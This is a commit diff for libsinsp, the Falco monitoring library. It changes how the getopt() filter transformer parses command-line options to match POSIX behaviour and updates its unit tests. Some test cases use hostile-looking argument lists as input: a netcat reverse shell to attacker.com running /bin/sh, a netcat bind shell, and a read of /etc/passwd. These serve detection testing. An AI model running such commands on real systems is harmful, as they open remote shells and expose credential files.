Skip to content

Commit 2a62824

Browse files
committed
fix(libsinsp): align getopt transformer semantics
Signed-off-by: Roberto Scolaro <roberto.scolaro21@gmail.com>
1 parent 2cb00cc commit 2a62824

2 files changed

Lines changed: 45 additions & 179 deletions

File tree

userspace/libsinsp/sinsp_filtercheck_multivalue_transformer.cpp

Lines changed: 28 additions & 45 deletions
Original file line numberDiff line numberDiff line change
@@ -14,7 +14,8 @@
1414
*/
1515

1616
#include <libsinsp/sinsp_filtercheck_multivalue_transformer.h>
17-
#include "driver/ppm_events_public.h"
17+
18+
#include <array>
1819

1920
sinsp_filter_multivalue_transformer::sinsp_filter_multivalue_transformer(
2021
value_type_info result,
@@ -271,103 +272,85 @@ std::string sinsp_filter_multivalue_transformer_getopt::name() const {
271272
bool sinsp_filter_multivalue_transformer_getopt::extract(sinsp_evt* evt,
272273
std::vector<extract_value_t>& values,
273274
bool sanitize_strings) {
274-
// Extract the optstring (second argument)
275275
values.clear();
276276
if(!m_arguments.at(1)->extract(evt, values, sanitize_strings)) {
277277
return false;
278278
}
279-
// Copy optstring to avoid pointer invalidation when values is cleared
280279
std::string optstring((char*)values[0].ptr, values[0].len);
281280

282-
// Build a lookup table for which options require arguments
283-
bool opts_with_args[256] = {};
284-
for(size_t i = 0; i < optstring.size(); i++) {
285-
unsigned char opt = static_cast<unsigned char>(optstring[i]);
286-
if(i + 1 < optstring.size() && optstring[i + 1] == ':') {
281+
bool missing_arg_returns_colon = !optstring.empty() && optstring[0] == ':';
282+
size_t opt_idx = missing_arg_returns_colon ? 1 : 0;
283+
std::array<bool, 256> valid_opts = {};
284+
std::array<bool, 256> opts_with_args = {};
285+
for(; opt_idx < optstring.size(); opt_idx++) {
286+
unsigned char opt = static_cast<unsigned char>(optstring[opt_idx]);
287+
if(opt == ':') {
288+
continue;
289+
}
290+
valid_opts[opt] = true;
291+
if(opt_idx + 1 < optstring.size() && optstring[opt_idx + 1] == ':') {
287292
opts_with_args[opt] = true;
288-
i++; // Skip the ':'
293+
opt_idx++;
289294
}
290295
}
291296

292-
// Extract the arguments list (first argument)
293297
values.clear();
294298
if(!m_arguments.at(0)->extract(evt, values, sanitize_strings)) {
295299
return false;
296300
}
297301

298-
// Parse the arguments following POSIX getopt conventions
299302
m_result_storage.clear();
300303
m_storage.clear();
301304

302305
for(size_t arg_idx = 0; arg_idx < values.size(); arg_idx++) {
303306
const char* arg_ptr = (char*)values[arg_idx].ptr;
304307
size_t arg_len = values[arg_idx].len;
305308

306-
// Stop processing at "--"
307309
if(arg_len == 2 && arg_ptr[0] == '-' && arg_ptr[1] == '-') {
308310
break;
309311
}
310312

311-
// Skip non-option arguments (doesn't start with - or is just -)
312-
// Continue processing to support GNU extension (options after non-options)
313-
if(arg_len == 0 || arg_ptr[0] != '-' || arg_len == 1) {
313+
// Long options are not supported by getopt(). Skip tokens like
314+
// "--exec" so they are not misparsed as clusters of short options.
315+
if(arg_len > 2 && arg_ptr[0] == '-' && arg_ptr[1] == '-') {
314316
continue;
315317
}
316318

317-
// Process each character after the '-'
319+
if(arg_len == 0 || arg_ptr[0] != '-' || arg_len == 1) {
320+
break;
321+
}
322+
318323
for(size_t i = 1; i < arg_len; i++) {
319324
unsigned char opt = static_cast<unsigned char>(arg_ptr[i]);
320325

321-
// Check if this option is alphanumeric
322-
if(!std::isalnum(opt)) {
326+
if(opt == ':' || !valid_opts[opt]) {
327+
m_result_storage.emplace_back("?");
323328
continue;
324329
}
325330

326-
// Check if this option is in the optstring
327-
bool found = false;
328-
for(size_t j = 0; j < optstring.size(); j++) {
329-
if(optstring[j] == static_cast<char>(opt) && optstring[j] != ':') {
330-
found = true;
331-
break;
332-
}
333-
}
334-
if(!found) {
335-
continue;
336-
}
337-
338-
// Add the option character to result
339-
// Use emplace_back to construct in-place and avoid extra allocation
340331
m_result_storage.emplace_back(1, static_cast<char>(opt));
341332

342-
// Check if this option requires an argument
343333
if(opts_with_args[opt]) {
344-
// Option value can be:
345-
// 1. Remainder of current argument (e.g., -ofoo same as -o foo)
346-
// 2. Next argument (e.g., -o foo)
347334
if(i + 1 < arg_len) {
348-
// Value is remainder of current argument
349335
m_result_storage.emplace_back(arg_ptr + i + 1, arg_len - i - 1);
350-
break; // Done with this argument
336+
break;
351337
} else if(arg_idx + 1 < values.size()) {
352-
// Value is next argument
353338
arg_idx++;
354339
m_result_storage.emplace_back((char*)values[arg_idx].ptr, values[arg_idx].len);
355-
break; // Done with this argument
340+
break;
356341
} else {
357-
// No value available, use empty string
358-
m_result_storage.emplace_back();
342+
m_result_storage.pop_back();
343+
m_result_storage.emplace_back(missing_arg_returns_colon ? ":" : "?");
359344
}
360345
}
361346
}
362347
}
363348

364-
// Convert result storage to extract_value_t format
365349
values.clear();
366350
values.reserve(m_result_storage.size());
367-
// Calculate exact space needed and reserve to prevent reallocation (would invalidate pointers)
368351
size_t total_size = 0;
369352
for(const auto& str : m_result_storage) {
370-
total_size += str.size() + 1; // +1 for null terminator
353+
total_size += str.size() + 1;
371354
}
372355
m_storage.reserve(total_size);
373356

userspace/libsinsp/test/filter_transformer.ut.cpp

Lines changed: 17 additions & 134 deletions
Original file line numberDiff line numberDiff line change
@@ -723,127 +723,63 @@ TEST_F(sinsp_with_test_input, multivalue_transformer_getopt) {
723723
0,
724724
(uint64_t)0);
725725

726-
// Test basic option without argument: -n
727726
EXPECT_TRUE(eval_filter(evt, R"(getopt(("-n",""), "n") intersects ("n"))"));
728-
729-
// Test option with argument: -t hello
730727
EXPECT_TRUE(eval_filter(evt, R"(getopt(("-t", "hello"), "t:") intersects ("t", "hello"))"));
731-
732-
// Test grouped options: -nt hello
733728
EXPECT_TRUE(
734729
eval_filter(evt, R"(getopt(("-nt", "hello"), "nt:") intersects ("n", "t", "hello"))"));
735-
736-
// Test option with immediate value: -thello
737730
EXPECT_TRUE(eval_filter(evt, R"(getopt(("-thello"), "t:") intersects ("t", "hello"))"));
738-
739-
// Test multiple separate options
740731
EXPECT_TRUE(
741732
eval_filter(evt,
742733
R"(getopt(("-n", "-t", "hello"), "nt:") intersects ("n", "t", "hello"))"));
743-
744-
// Test that option not present doesn't match
745734
EXPECT_FALSE(eval_filter(evt, R"(getopt(("-n"), "n") intersects ("t"))"));
746-
747-
// Test -- stops option parsing
748735
EXPECT_TRUE(eval_filter(evt, R"(getopt(("-n", "--", "-t"), "nt:") intersects ("n"))"));
749736
EXPECT_FALSE(eval_filter(evt, R"(getopt(("-n", "--", "-t"), "nt:") intersects ("t"))"));
750-
751-
// Test unknown options are skipped
752-
EXPECT_TRUE(eval_filter(evt, R"(getopt(("-x", "-n"), "n") intersects ("n"))"));
737+
EXPECT_TRUE(eval_filter(evt, R"(getopt(("-x", "-n"), "n") intersects ("?", "n"))"));
753738
EXPECT_FALSE(eval_filter(evt, R"(getopt(("-x", "-n"), "n") intersects ("x"))"));
754-
755-
// Test non-option arguments are skipped
756-
EXPECT_TRUE(eval_filter(evt, R"(getopt(("arg1", "-n", "arg2"), "n") intersects ("n"))"));
757-
758-
// Test complex real-world example: nc -l -p 8080 -e /bin/sh
759739
EXPECT_TRUE(eval_filter(
760740
evt,
761741
R"(getopt(("-l", "-p", "8080", "-e", "/bin/sh"), "lp:e:") intersects ("l", "p", "e", "8080", "/bin/sh"))"));
762-
763-
// Test grouped options with value: -lpe /bin/sh
764742
EXPECT_TRUE(
765743
eval_filter(evt, R"(getopt(("-lpe", "/bin/sh"), "lp:e:") intersects ("l","p","e"))"));
766744
EXPECT_TRUE(eval_filter(evt, R"(getopt(("-lpe", "/bin/sh"), "lpe:") intersects ("/bin/sh"))"));
767745

768-
// Validation error tests
769-
// getopt() requires exactly 2 arguments
770746
EXPECT_THROW(eval_filter(evt, R"(getopt() intersects ("n"))"), sinsp_exception);
771747
EXPECT_THROW(eval_filter(evt, R"(getopt(("a")) intersects ("n"))"), sinsp_exception);
772748
EXPECT_THROW(eval_filter(evt, R"(getopt(("a"), "n", "extra") intersects ("n"))"),
773749
sinsp_exception);
774-
775-
// getopt() first argument must be a list
776750
EXPECT_THROW(eval_filter(evt, R"(getopt("not_a_list", "n") intersects ("n"))"),
777751
sinsp_exception);
778-
779-
// getopt() second argument must not be a list
780752
EXPECT_THROW(eval_filter(evt, R"(getopt(("-n"), ("n")) intersects ("n"))"), sinsp_exception);
781753

782-
// ========== Edge Cases ==========
783-
784-
// Empty optstring - no options should be recognized
785754
EXPECT_FALSE(eval_filter(evt, R"(getopt(("-n", "-t"), "") intersects ("n"))"));
786755
EXPECT_FALSE(eval_filter(evt, R"(getopt(("-n", "-t"), "") intersects ("t"))"));
787-
788-
// Empty argument list - should return empty result
789756
EXPECT_FALSE(eval_filter(evt, R"(getopt((""), "n") intersects ("n"))"));
790-
791-
// All arguments are non-options - should return empty result
792757
EXPECT_FALSE(eval_filter(evt, R"(getopt(("arg1", "arg2", "arg3"), "n") intersects ("n"))"));
793-
794-
// Single dash "-" is not an option (should be skipped)
795-
EXPECT_TRUE(eval_filter(evt, R"(getopt(("-", "-n"), "n") intersects ("n"))"));
758+
EXPECT_FALSE(eval_filter(evt, R"(getopt(("arg1", "-n", "arg2"), "n") intersects ("n"))"));
759+
EXPECT_FALSE(eval_filter(evt, R"(getopt(("-", "-n"), "n") intersects ("n"))"));
796760
EXPECT_FALSE(eval_filter(evt, R"(getopt(("-"), "n") intersects ("n"))"));
797-
798-
// Option requiring argument but none provided (uses empty string)
799-
EXPECT_TRUE(eval_filter(evt, R"(getopt(("-t"), "t:") intersects ("t"))"));
800-
EXPECT_TRUE(eval_filter(evt, R"(getopt(("-t"), "t:") intersects (""))"));
801-
802-
// Multiple dashes in a row
761+
EXPECT_TRUE(eval_filter(evt, R"(getopt(("-t"), "t:") intersects ("?"))"));
762+
EXPECT_FALSE(eval_filter(evt, R"(getopt(("-t"), "t:") intersects ("t"))"));
763+
EXPECT_TRUE(eval_filter(evt, R"(getopt(("-t"), ":t:") intersects (":"))"));
803764
EXPECT_TRUE(eval_filter(evt, R"(getopt(("-n", "--", "--"), "n") intersects ("n"))"));
804765
EXPECT_FALSE(eval_filter(evt, R"(getopt(("--", "-n"), "n") intersects ("n"))"));
805-
806-
// Non-alphanumeric characters in option position (should be skipped)
807-
EXPECT_TRUE(eval_filter(evt, R"(getopt(("-n-t"), "nt") intersects ("n", "t"))"));
808-
809-
// ========== Chaining Edge Cases ==========
810-
811-
// Chain with argument-taking option in the middle: -nat hello
812-
// Should parse as: n (no arg), a (takes "t hello" - wait, no)
813-
// Actually: n (no arg), a (takes "t" as immediate arg from same token)
814766
EXPECT_TRUE(
815767
eval_filter(evt, R"(getopt(("-nat", "hello"), "na:t") intersects ("n", "a", "t"))"));
816-
817-
// Chain with multiple no-arg options followed by arg-taking option with immediate value
818768
EXPECT_TRUE(
819769
eval_filter(evt,
820770
R"(getopt(("-abcvalue"), "abc:") intersects ("a", "b", "c", "value"))"));
821-
822-
// Chain where last option takes argument from next token
823771
EXPECT_TRUE(eval_filter(
824772
evt,
825773
R"(getopt(("-abc", "value"), "abc:") intersects ("a", "b", "c", "value"))"));
826-
827-
// Same option appearing multiple times
828774
EXPECT_TRUE(eval_filter(evt, R"(getopt(("-n", "-n", "-n"), "n") intersects ("n"))"));
829775
EXPECT_TRUE(eval_filter(evt, R"(getopt(("-v", "-v", "-v"), "v") intersects ("v"))"));
830-
831-
// Option with argument appearing multiple times
832776
EXPECT_TRUE(eval_filter(
833777
evt,
834778
R"(getopt(("-t", "val1", "-t", "val2"), "t:") intersects ("t", "val1", "val2"))"));
835-
836-
// ========== Numeric and Special Arguments ==========
837-
838-
// Options with numeric arguments
839779
EXPECT_TRUE(eval_filter(evt, R"(getopt(("-p", "8080"), "p:") intersects ("p", "8080"))"));
840780
EXPECT_TRUE(eval_filter(evt, R"(getopt(("-p8080"), "p:") intersects ("p", "8080"))"));
841781
EXPECT_TRUE(eval_filter(evt, R"(getopt(("-n", "42"), "n:") intersects ("n", "42"))"));
842-
843-
// Options with negative numbers as arguments
844782
EXPECT_TRUE(eval_filter(evt, R"(getopt(("-t", "-123"), "t:") intersects ("t", "-123"))"));
845-
846-
// Options with paths as arguments
847783
EXPECT_TRUE(
848784
eval_filter(evt,
849785
R"(getopt(("-f", "/etc/passwd"), "f:") intersects ("f", "/etc/passwd"))"));
@@ -855,112 +791,59 @@ TEST_F(sinsp_with_test_input, multivalue_transformer_getopt) {
855791
EXPECT_TRUE(eval_filter(
856792
evt,
857793
R"(getopt(("-u", "http://example.com:8080/path"), "u:") intersects ("u", "http://example.com:8080/path"))"));
858-
859-
// Options with empty string as explicit argument
860794
EXPECT_TRUE(eval_filter(evt, R"(getopt(("-t", ""), "t:") intersects ("t", ""))"));
861-
862-
// ========== Real-World Command Examples ==========
863-
864-
// SSH-like: ssh -p 22 -i keyfile user@host
865795
EXPECT_TRUE(eval_filter(
866796
evt,
867797
R"(getopt(("-p", "22", "-i", "keyfile", "user@host"), "p:i:") intersects ("p", "22", "i", "keyfile"))"));
868-
869-
// Tar-like: tar -xzf file.tar.gz
870798
EXPECT_TRUE(eval_filter(
871799
evt,
872800
R"(getopt(("-xzf", "file.tar.gz"), "xzf:") intersects ("x", "z", "f", "file.tar.gz"))"));
873-
874-
// Curl-like: curl -X POST -H "header" -d "data" url
875801
EXPECT_TRUE(eval_filter(
876802
evt,
877803
R"(getopt(("-X", "POST", "-H", "header", "-d", "data", "url"), "X:H:d:") intersects ("X", "POST", "H", "header", "d", "data"))"));
878-
879-
// Netcat reverse shell: nc -e /bin/sh attacker.com 4444
880804
EXPECT_TRUE(eval_filter(
881805
evt,
882806
R"(getopt(("-e", "/bin/sh", "attacker.com", "4444"), "e:") intersects ("e", "/bin/sh"))"));
883-
884-
// Grep-like: grep -rn "pattern" /path
885807
EXPECT_TRUE(
886808
eval_filter(evt, R"(getopt(("-rn", "pattern", "/path"), "rn") intersects ("r", "n"))"));
887-
888-
// Docker-like: docker run -it -p 8080:80 -v /host:/container image
889809
EXPECT_TRUE(eval_filter(
890810
evt,
891811
R"(getopt(("-it", "-p", "8080:80", "-v", "/host:/container", "image"), "itp:v:") intersects ("i", "t", "p", "8080:80", "v", "/host:/container"))"));
892-
893-
// Find with exec: find . -name "*.txt" -exec rm {} \;
894-
EXPECT_TRUE(eval_filter(
895-
evt,
896-
R"(getopt(("-name", "*.txt", "-exec", "rm", "{}", ";"), "n:e:") intersects ("n", "*.txt", "e", "rm"))"));
897-
898-
// ========== Complex Optstring Patterns ==========
899-
900-
// All options take arguments
901812
EXPECT_TRUE(eval_filter(
902813
evt,
903814
R"(getopt(("-a", "1", "-b", "2", "-c", "3"), "a:b:c:") intersects ("a", "1", "b", "2", "c", "3"))"));
904-
905-
// No options take arguments
906815
EXPECT_TRUE(eval_filter(evt, R"(getopt(("-abc"), "abc") intersects ("a", "b", "c"))"));
907-
908-
// Alternating: option, arg, option, no-arg
909816
EXPECT_TRUE(
910817
eval_filter(evt, R"(getopt(("-a", "val", "-b"), "a:b") intersects ("a", "val", "b"))"));
911-
912-
// Long chain with mix
913818
EXPECT_TRUE(eval_filter(
914819
evt,
915820
R"(getopt(("-abcdefg"), "abcdefg") intersects ("a", "b", "c", "d", "e", "f", "g"))"));
916-
917-
// Numeric option names
918821
EXPECT_TRUE(
919822
eval_filter(evt, R"(getopt(("-1", "-2", "-3"), "123") intersects ("1", "2", "3"))"));
920-
921-
// Mixed alphanumeric options
922823
EXPECT_TRUE(eval_filter(
923824
evt,
924825
R"(getopt(("-a1b2c3"), "a1b2c3") intersects ("a", "1", "b", "2", "c", "3"))"));
925-
926-
// ========== Option After Non-Option (GNU Extension) ==========
927-
928-
// Options scattered among non-options
929-
EXPECT_TRUE(eval_filter(
930-
evt,
931-
R"(getopt(("file1", "-n", "file2", "-t", "val", "file3"), "nt:") intersects ("n", "t", "val"))"));
932-
933-
// Non-options at start, middle, and end
934-
EXPECT_TRUE(eval_filter(
826+
EXPECT_FALSE(eval_filter(
935827
evt,
936-
R"(getopt(("arg1", "arg2", "-a", "arg3", "-b", "arg4", "arg5"), "ab") intersects ("a", "b"))"));
937-
938-
// Option takes non-option as argument
828+
R"(getopt(("regular_file", "-f", "another_file"), "f:") intersects ("f", "another_file"))"));
939829
EXPECT_TRUE(eval_filter(
940830
evt,
941-
R"(getopt(("regular_file", "-f", "another_file"), "f:") intersects ("f", "another_file"))"));
942-
943-
// ========== Empty Values and Whitespace ==========
944-
945-
// Option with whitespace-only argument (if supported by the test framework)
831+
R"(getopt(("-f", "another_file", "regular_file"), "f:") intersects ("f", "another_file"))"));
946832
EXPECT_TRUE(eval_filter(evt, R"(getopt(("-t", " "), "t:") intersects ("t", " "))"));
947-
948-
// Multiple empty strings in argument list
949-
EXPECT_TRUE(eval_filter(evt, R"(getopt(("", "-n", ""), "n") intersects ("n"))"));
950-
951-
// ========== Stress Tests ==========
952-
953-
// Very long option chain
833+
EXPECT_FALSE(eval_filter(evt, R"(getopt(("", "-n", ""), "n") intersects ("n"))"));
834+
EXPECT_TRUE(eval_filter(evt, R"(getopt(("-@", "-+"), "@+") intersects ("@", "+"))"));
835+
EXPECT_TRUE(eval_filter(evt, R"(getopt(("-nx"), "n") intersects ("n", "?"))"));
836+
EXPECT_FALSE(eval_filter(evt, R"(getopt(("--exec"), "e:") intersects ("?"))"));
837+
EXPECT_FALSE(eval_filter(evt, R"(getopt(("--exec"), "e:") intersects ("e"))"));
838+
EXPECT_TRUE(eval_filter(evt, R"(getopt(("--exec", "-n"), "n") intersects ("n"))"));
839+
EXPECT_TRUE(eval_filter(evt, R"(getopt(("-n", "file", "-t"), "nt") intersects ("n"))"));
840+
EXPECT_FALSE(eval_filter(evt, R"(getopt(("-n", "file", "-t"), "nt") intersects ("t"))"));
954841
EXPECT_TRUE(eval_filter(
955842
evt,
956843
R"(getopt(("-abcdefghijklmnopqrstuvwxyz"), "abcdefghijklmnopqrstuvwxyz") intersects ("a", "b", "c", "z"))"));
957-
958-
// Many separate options
959844
EXPECT_TRUE(eval_filter(
960845
evt,
961846
R"(getopt(("-a", "-b", "-c", "-d", "-e", "-f"), "abcdef") intersects ("a", "b", "c", "d", "e", "f"))"));
962-
963-
// Option with very long argument value
964847
EXPECT_TRUE(eval_filter(
965848
evt,
966849
R"(getopt(("-t", "this_is_a_very_long_argument_value_that_might_test_buffer_handling"), "t:") intersects ("t", "this_is_a_very_long_argument_value_that_might_test_buffer_handling"))"));

0 commit comments

Comments
 (0)